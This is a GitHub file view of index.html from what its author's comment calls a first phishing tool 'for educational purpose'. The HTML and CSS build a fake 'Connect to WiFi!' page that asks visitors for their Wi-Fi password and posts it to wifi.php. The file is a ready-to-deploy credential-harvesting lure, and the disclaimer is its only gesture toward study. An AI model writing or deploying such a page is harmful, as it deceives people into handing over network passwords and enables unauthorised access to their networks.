-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
107 lines (87 loc) · 2.1 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
<!--
This tool is created by Adarsh Addee.
Use this tool only fpr educational purpose.
Note: This is my first Phishing Tool 😁.
-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Connect to WiFi!</title>
</head>
<style>
*{
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
html {
font-size: 62.5%;
}
body {
width: 100%;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
#main, form {
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
}
#main {
width: 30rem;
height: 30.5rem;
box-shadow: 0px 0px 10px 5px grey;
border-radius: 5px;
gap: 20px;
}
img {
width: 100px;
}
h3 {
font-size: 20px;
text-align: center;
}
form {
width: 100%;
}
input {
font-weight: 500;
font-size: 15px;
border-radius: 5px;
outline: none;
border: 2px solid black;
padding: 7px;
width: 80%;
}
button {
width: 50%;
padding: 6px;
font-size: 15px;
font-weight: 700;
background-color: rgb(4, 245, 129);
border: none;
outline: none;
border-radius: 5px;
cursor: pointer;
margin: 2px;
}
</style>
<body>
<div id="main">
<img src="img/wifi.png" alt="Wifi" />
<h3>Enter your WiFI password to connect!</h3>
<form action="wifi.php" method="post">
<input type="password" placeholder="Enter Your Wi-fi Password" name="pass" required />
<br>
<button>Submit</button>
</form>
</div>
</body>
</html>